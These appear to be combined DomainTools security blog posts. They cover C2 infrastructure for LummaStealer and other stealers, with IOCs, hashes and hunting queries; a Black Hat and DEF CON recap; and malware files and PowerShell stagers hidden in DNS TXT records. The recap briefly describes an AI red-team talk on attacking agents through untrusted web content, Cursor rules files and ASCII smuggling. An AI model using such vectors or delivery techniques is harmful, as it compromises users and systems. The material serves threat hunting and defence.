CAIDA - Hunting in the Dark: Metrics for Early Stage Traffic Discovery - “Using a metric for discoverability, we model the ability of defenders to measure Crackonosh traffic as the malware population decreases, evaluate the strength of various detection methods, and demonstrate how different darkspace sizes affect both the ability to track the malware, but enable emergent behaviors by exploiting attacker mistakes.”

arXiv - Security Challenges in AI Agent Deployment: Insights from a Large Scale Public Competition - Results of wide-scale competitive testing across several dozen agents and models, with an eye to evaluating attack transferability and common vulnerabilities. Some significant findings, including limited correlation between size, robustness, or inference-time, meaning that the “better” and “bigger” models didn’t do better than the bargain basement models. 

Tools and Resources

CSO Online - CISA releases Thorium, an open-source, scalable platform for malware analysis - Curious to see where this goes, relative to NSA’s Ghidra.

Entertaining Reading

Wikipedia - The Berners Street Hoax - “Hook spent six weeks sending between a thousand and four thousand letters to tradespeople and businesses ordering deliveries of their goods and services to 54 Berners Street, Westminster, at various times on 27 November 1810.”

Details

Hunting for new malware delivery infrastructure often entails the identification and tracking of common techniques to deliver various stages of malware. Take malware-as-a-service providers for instance, some commonalities in a recent activity cluster entailed the use of hosted powershell scripts acting as a reference to the next malware to download and execute. 

Multiple clusters of stealer activity were observed through early July using PowerShell scripts as an intermediate stage for malware delivery. Creating multiple stages of delivery reduces the initial risk of exposing all malware and associated infrastructure if it is detected early on in execution. It may also slow down response investigations and analysis. 

Hunting for malicious web hosted PowerShell scripts can be as simple as using a Shodan query such as: http.html:"Invoke-WebRequest”.

Example Finding:
77.110.118.195 Resolved malicious domain “alababababa[.]cloud”.

A reused web-hosted powershell script to retrieve a malicious executable, build.exe, which it then starts as a new process.

Filename: build.exe
Sha256: 7ada4d7dfc00943780cb51ea182c7a221953cdabc394011204ba5cd8e4e8f0d3

This script acts as a trojan and connects to a commonly used C2 domain “anodes[.]pro”, which has communicated with more than60 malicious files in the past 2 months, including multiple stealer malware families such as Amadey, Lumma,  Luca, DeerStealer, and RedLine as well as other malware families Rugmi, BlackBasta and DarkGate.

Expanding on the domain behavior in VirusTotal, one additional DeerStealer sample was identified, which also used the same C2 domain. 

Sha256: bd269a6328de0e534f4d8c3a42ea88a4343168053f63da0da95318f4ed17e705

Expanding on the associated infrastructure of the identified intermediary domain “alababababa[.]cloud” through domain registration overlaps identified potentially related activity.

• NameServer: cloudflare[.]com
• IP ISP: CloudFlare Inc
• Address: compliance_abuse[@]webnic[.]cc
• Registrar: WebNIC
• SSL Issuer: WE1

‍

Repeating the previous steps identifies additional malware with commonalities in stealer and C2 usage such as Amadey malware being observed with domain “hugevcdn[.]pro”.

Sha256: 02c158c63d28fd5be24424e41b70a7a361c9be8897590c0453b0d30bd6e0d842
C2: "185.156.72[.]96/te4h2nus/index.php

Similar but considerably higher volume to the C2 domain “anodes[.].pro”, the C2 IP 185.156.72[.]96 has been observed with over 2,700 malicious files communicating to it. Notably with many of the same wide range of malware-as-a-service families using it as a C2.  

In addition, many of the malicious files for LummaStealer and Amadey shared a common C2 IP “185.156.72[.]96” and overlaps with a previous LummaStealer IP “185.156.72[.]2”.

Both IPs are part of an obscure ASN (AS61432) TOV VAIZ PARTNER. This ASN has only one prefix (185.156.72.0/24), which shows only 1 out 719 BGP peer propagations for Hurricane Electric Services. The ASN claims Ukrainian origin and appears to only be propagated by 1 other ASN, AS50073 Webcraft Found LLC in Ukraine. This may generally suggest the ASN is part of a BPHS, bulletproof hosting service.

Example LummaStealer C2s associated to IP 185.156.72[.]2 and 185.156.72[.]96 and anodes[.]pro

‍

Noting a reused SSH certificate “hash:896675070” and “hash:-434889431” from the C2 IP address identifies several historic overlaps such as the following recent IPs:

‍

In addition to indications that the large cluster of malware employs Amazon CloudFront, Amazon Global Accelerator EC2s, and Github user content being used to store and distribute malware. All of which create challenges in proactively blocking malicious domains.

Example 1:
https[:]//raw.githubusercontent[.]com/peterson643eu/projecttop/36b05b6030459ba5435705d8b91aae11f0ba268b/NIOAHYWM.exe
https[:]//raw.githubusercontent[.]com/peterson643eu/projecttop/6fd8d0859aa9d3d300bf79f3da8032b04b1ed540/OURDUBDV.exe
https[:]//github[.]com/peterson643eu/projecttop/raw/refs/heads/main/OURDUBDV.exe

Makes request to http[:]//nexuswarps[.]shop/c
C2s: anodes[.]pro, multiport[.]shop

SSL Hash overlaps with a CloudFront IP resolving “70d9ae273c860e606f236c528381f9ca[.]cloudfront[.]net” suggests the CloudFront service may be used to relay traffic to another endpoint serving malware.

Sampling 200 of the communicating files with meaningful detection names in VirusTotal and limiting to the past 3 months there is an overrepresentative share of LummaC2 and Amadey.

Despite law enforcement takedowns targeting LummaStealer infrastructure in May 2025, it appears Lumma is still operating and continues to be a prominent choice. Though we speculate that this particular cluster of malicious activity decidedly experimented with alternative choices during the month of June and may have opted to continue operations with LummaStealer.  

Conclusion

Despite a May 2025 law enforcement takedown targeting LummaStealer, the malware family appears to remain active and a popular choice for threat actors, particularly through bulletproof hosting services (BPHS) IPs. This analysis of observed malicious activity, with a focus on C2 IPs 185.156.72[.]96 and 185.156.72[.]2 (both part of AS61432, a suspected BPHS), suggests that while there may have been some experimentation with alternative malware during June, operations have largely continued with LummaStealer.

IOCs

Hacker Summer Camp recedes into the rearview mirror and the world starts back up again.

Morning standup. Q3 sprint. Follow-ups and circle-backs. But perhaps we’re changed. Perhaps we re-enter the frays in a slightly different way, shedding data of a marginally changed nature. Philosopher and media theorist Marshall McLuhan said that as a species, “We look at the present through a rear-view mirror” in our “march backwards into the future.”

He continued: “Because of the invisibility of any environment during the period of its innovation, man is only conscious of the environment that has preceded it; in other words, an environment becomes fully visible only when it has been superseded by a new environment.”

Does the landscape after BSidesLV, Black Hat, and DEF CON count as a new environment? Could the information gleaned, hands shaken, and drinks shared change us significantly going forward?

For my part, I always emerge from this week in Las Vegas and find my surroundings drawn into sharper relief. Finer lines mark more edges, but they also bring us together in more ways, if we let them. Light sources are brighter, or revealed as so bright they hid now-revealed details, like a message written on the lightbulb only visible in the briefest of moments upon flicking the switch off. 

McLuhan’s observation in mind, that may be my sign that our chaotic week of community each year marks a new environment, superseding the old and making the latter finally visible. 

Or perhaps that I just need more sleep this year.

—-------

Folks often pose the question: “Which is better, Black Hat or DEF CON?”

The real answer is, “It depends.” 

Black Hat starts the week out with everyone fresh and wide-eyed, staring down the barrel of at least six days of scrambling if they attend both conferences. It is to my benefit that we take care of the business end first before the social and sensory overwhelm hits - I’m much more articulate and sociable, moving mountains to meet practitioners, collaborators, and customers. Discussions are more hard-nosed, shorter, and more focused. Metrics rule the day.

That being said, Black Hat is a delight of a different sort. It’s a much more focused and organized entity rather than creeping chaos. Meeting up with other practitioners and talking shop involves a lot less small talk, with a substantial chunk of theory discussion and an even larger space held to talk practice. 

Plus, less bare concrete. 

One highlight of my Black Hat arrived early; my first briefing was From Prompts to Pwns: Exploiting and Securing AI Agents, presented by NVIDIA AI Red Teamers Rebecca Lynch and Rich Harang. Lynch and Harang began by providing an excellent technical foundation. Points included LLM compromise as enabled by a “universal anti-pattern” that allows for the attacks, as well as agentic autonomy classifications and their relation to both systems architecture and the introduction of nondeterminism into the system. They then pivoted to the practical nature of their red teaming and the realities that informed it. LLM guardrails are mostly just other LLMs performing checks, and so subject to similar attacks. And since these platforms are often crawling the web, the ability to introduce untrusted content spans the entire Internet. Specific technical observables included Cursor rules files, ASCII smuggling, and more. And the idea that malicious actors can more effectively use LLMs to socially engineer the user than other technologies was a brilliant insight.

The talk was equal parts funny and grim, and I’m now hungry to see more from NVIDIA’s AI Red Team.

Another highlight came from the venerable Threat Intel team at Infoblox, No Hoodies Here: Organized Crime in AdTech. The talk revolved around long-term and fascinating research around spam & scam cybercriminals VexTrio, accompanied by the second in Infoblox’ blog series on the group (you can find the first post here). Their research laid bare the evolution of VexTrio into an adtech powerhouse of villainy, complete with Instagram photos of their fast cars, lavish meals, and expensive boats. A deep understanding of both the technologies involved and the human behavior behind them emerged through excellent research and storytelling.

—-------

DEF CON is, of course, an entirely different animal. It’s about one-tenth the price, and I’d guess at least twice the size of Black Hat. And the chaos only ends where the concrete does too (that’s not hyperbole by the way, the floors are all concrete, bring good shoes and ibuprofen).

Now that DEF CON has moved to a single venue it’s become a little more manageable, and staff learned the ins and outs of the new complex last year and applied those lessons to great effect. Attendance is much wider spread than Black Hat, with enthusiasts and other kinds of technologists in attendance. 

There’s more swagger, but there’s also more joy; folks assembling under an umbrella of energetic curiosity and irreverence and self-organizing across a number of villages as well as the main stage talks. 

We were able and honored to show up to and share with DEF CON 33 in a big way three separate talks in three separate villages. 

DNS Scavenger Hunt
Security Advisor Malachi Walker gave an interactive talk at the Blacks in Cyber Village: Following Threat Actors’ Rhythm — to Give Them More Blues. The talk provided indicators to follow around threat actor activity and then engaged the crowd in a DNS-based scavenger hunt from the terminal.

Malware in DNS
Malachi Walker and Senior Security Operations Engineer Ian Campbell spoke on investigative findings in the Malware Village: Plain TXT, Malicious Context: Uncovering DNS Malware. Included were DNS investigation basics, and then several real-world examples of DNS TXT records being used for malware storage and retrieval as well as the step-by-step detection specifics. There’s a bonus round at the end of the slide deck for folks interested in domain mysteries!

Pre-Identifying DNS Wildcards: A New Standard of Care
CISO and Head of Investigations Daniel Schwalbe presented original research and enablement at Recon Village. Informed by a DEF CON 31 win at the Subdomain Enumeration Contest, an alternative method identifying 100 times the winning results required a parallel new solution to identifying and removing wildcarded domains.

Of course, other folks were there too. A LOT of them, actually. And many giving great talks on stages or in villages. Yale Grauer in the Crypto and Privacy Village on Cyber Defenses, cooperq and oopsbagel in the hackers.town community on Rayhunter Internals, and our friend Jon DiMaggio co-speaking with Jon Fokker on the Track 5 stage spilling the tea about a REvil actor, to name just a few. This latter was a fantastic talk that showed the deep and inextricable connection between ransomware observables, human behavior, and group dynamics with substantial realness. 

Summer in Las Vegas is always hot, and uncomfortable, and packed with people. But at the same time, filled to the brim with joy and curiosity, serious business alongside frenetic nerdery. Different but often parallel strains of justice running through many diverse communities celebrating their uniqueness and their shared loves and interests simultaneously. 

I don’t know of another week like it anywhere, and I wouldn’t have it any other way.

(except for maybe the concrete floors.)

Join our teams as they share their DEF CON talks on Tuesday, September 30: https://www.domaintools.com/defcon-session-recap-customer-webinar/

It is a lovely day in information security,

and you are a horrible goose.

We’re a week away from Hacker Summer Camp, and I’m curious: similar to the writer conversation of “plotters versus pantsers” are your shenanigans all lined up in advance, or are your Vegas shenanigans more opportunistic and inspired by the moment? Do you carefully clean and arrange your tools, pack and unpack and repack in advance? Or do you live off the land and a few strips of rusty aluminum stripped from a can of Surge in 1997 and tucked in your wallet ever since?

Unless of course you’re the type of person to avoid shenanigans. Apparently those people exist.

This year’s Hacker Summer Camp includes some steam to vent. We’re charging into the desert amidst a cloud of hot dust and exploited Sharepoint embers, a mass-breach of women’s data after they sought safer dating, a new technology seemingly bent on speedrunning all the lessons computing has learned the hard way, and that’s not even getting into this year’s complexities around domestic agency capabilities. Everything considered, it’s enough to turn to nihilistic partying to cope.

But what I expect to see more of, what I’ve seen from the various clusters assembling for BlackHat, DEF CON, and BSides Las Vegas, is community. It’s our strongest power and our greatest defense. It’s often said that the Internet perceives censorship as damage and routes around it; and there may be drama, there may be dark points, there may be jerks, but community can react to damage the same way. And in many cases, it is.

Find the others. Reach out. Make grand collaborative plans, scale them back, amplify them further. Make room for the quieter voices. And don’t forget to make time to play.

Next week, let’s come to play. 

Podcasts

Lawfare - The Double Black Box: Ashley Deeks on National Security AI - Excellent, thoughtful exploration of ‘the idea that the use of artificial intelligence in the national security space creates a "double black box." The first box is the traditional secrecy surrounding national security activities, and the second, inner box is the inscrutable nature of AI systems themselves, whose decision-making processes can be opaque even to their creators.’ I picked up Deeks’ book immediately after listening to the podcast.

Srsly Risky Biz - Four key players drive Scattered Spider - Some interesting conclusions coming out lately. For instance, incident response investigators cross-referencing incidents attributed to SCATTERED SPIDER keep running across the same voices in voice-delivered social engineering attacks. Also, a few folks playing “Project Manager” roles. 

Articles

Okta - Okta observes v0 AI tool used to build phishing sites - Cheat-sheet style hint here: most Vercel-built sites have telltale DNS records CNAMEing back to vercel[.]com subdomains, and use vercel-dns[.]com nameservers. Maybe start building that into your detections and reassess once Vercel gets a handle on this. Looking at their nameservers for domains first seen July 28, I saw multiple career/application/hiring domains pretending to be from major corporations, several attempts at emulating the customer service platform of a major mobile provider, attempts to emulate adclick revenue and CRM platforms, and more. Just one day’s worth of new AI creations.

Proofpoint - NET RFQ: Request for Quote Scammers Casting Wide Net to Steal Real Goods | Proofpoint US - Good work by Proofpoint here amidst a fascinating scam leveraging “net-30” type financing to get goods or services, and then vanish. 

Resecurity - Cybercriminals Attack Seychelles – Offshore Banking as a Target - Well. That’s a shame.

The Record - Russian bulletproof hosting service Aeza Group sanctioned by US for ransomware work - Within a few days they started shifting their nameservers, and the primary ASN moved behind another Russia-aligned BGP safewall for its announcements. One of these days I need to dive deeper into technical observations after international sanctions; if you’ve got good examples, please reach out. 

knostic.ai - Exposing the Unseen: Mapping MCP Servers Across the Internet - Knostic (the startup brainchild of Gadi Evron and Sounil Yu) doing some great foundational fact-finding here around how organizations are deploying Anthropic’s Model Context Protocol. Unsurprisingly, the news isn’t good. 

Cisco Talos - Cybercriminal abuse of large language models - General but good roundup on some of the malicious uses seen in the wild. 

Lawfare - AI and Secure Code Generation - I don’t necessarily agree with everything, but Geer and Aitel know their stuff and make some very good points. 

Reuters - China-linked hackers target Taiwan's chip industry with increasing attacks, researchers say 

DTI - Malware in DNS - This was a quick but clever piece by one of our researchers that struck far louder chords than we expected. 

FT - Disinformation warriors are ‘grooming’ chatbots - LLM-grooming is the new cache poisoning, pass it on.

Research Papers and Reports

Censys - 2025 Sate of the Internet Report 

WEIS - Examining Newly Registered Phishing Domains at Scale 

Tools and Resources

INTERPOL - INTERPOL launches our new external newsletter  

Quad9 - Globe of Wonder - The good folks at Quad9 DNS have open-sourced their visualization tool for mapping realtime events onto a view of the Earth. 

Recent reports of hiding images in DNS records inspired an exploration for such files in the wild from passively collected DNS records available in DNSDB Scout. Put very simply, files can be partitioned and stored in DNS TXT records. They can then be retrieved via DNS requests and put back together. This also means these files may persist until the DNS server removes the records or overwrites them thereby providing a form of unwitting file or data storage. The initial report detailed the partitioning of image files and converting them to hexadecimal before issuing writes to a domain’s TXT records. For that reason, we began a search at the beginning of DNS RDATA TXT records for magic file bytes in hexadecimal format for a wide range of executables and common file types using regex patterns such as the following:

^"((ffd8ffe[0-9a-f].{12,})|(89504e47.{12,})|(47494638[79]61.{8,})|(255044462d.{10,})|(504b0304.{12,})|(4d5a.{16,59}|4d5a.{61,})|(7f454c46.{12,})|(c[ef]faedfe.{12,})|(1f8b08.{14,})|(377abcaf271c.{8,})|(526172211a07.{8,}))

One of the findings from 2021-2022 were TXT records beginning with the magic sequence for an executable file header.

C83464356139303030303330303030303030343030303030306666666630303030623830303030303030303030303030303430303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030306538303030303030306531666261306530306234303963643231623830313463636432313534363836393733323037303732366636373732363136643230363336313665366536663734323036323635

The same .exe header value was seen on 3 different domains, each sharing the same subdomain pattern. 

Digging into one of the domains, “*.felix.stf.whitetreecollective[.]com.”, we see that it has several hundreds of iterated subdomain integer values each with different TXT RDATA values. This suggested that they were fragmenting the .exe file across all the subdomains using the integer value to track the correct sequence.

By exporting the json of the domain TXT records and having a Generative AI throw a script together to piece the file back together in the correct order, we were able to observe the SHA256 file hashes of the files stored in DNS TXT records:

• 7ff0ecf2953b8662ede1577e330a514f09992c18aa3c14ed77cf2ffc115b0866
• e7b22ba761a7f853b63933ffe517cc61596710dbdee992a429ac1bc8d04186a1

Both files appear to be Joke Screenmate malware. These are a form of prank software and may commonly exhibit the following behaviors once run on machines:

• Simulating destructive actions: The program might display fake error messages, fictitious virus warnings, or animations that mimic the deletion of system files, causing panic for the user.
• Interfering with user control: Some screenmates are designed to be difficult to close, may multiply on the screen, or actively evade the user's mouse cursor.
• Displaying unsolicited content: These programs can present a continuous stream of jokes, images, or animations that can be distracting and difficult to stop.
• System performance issues: Like any running application, they consume system resources, and poorly coded screenmates can lead to system slowdowns or crashes.

A brief review of other TXT records for the 3 domains opened another line of inquiry, malicious commands stored in TXT records. This was seen with multiple TXT records associated to drsmitty[.]com such as the following subdomain’s TXT record: 15392.484f5fa5d2.dnsm.in.drsmitty[.]com.

The command contains an encoded Powershell script that acts as a stager and connects to another domain: cspg[.]pw. The URL it requests (/api/v1/nps/payload/stage1) is the default endpoint for a Covenant C2 server to serve its next-stage payload.

Being that the stager script is stored in a DNS TXT record is not by itself enough, some other action would have to take place first on a system to retrieve and execute the script such as the following:

In summary, in 2021-2022 an actor was using DNS TXT records to store and possibly deliver ScreenMate malware and stagers for likely Covenant C2 malware infections. The same C2 domain was seen in another domain’s TXT record in July 2017, msg1.rickrick.qa.urab[.]org.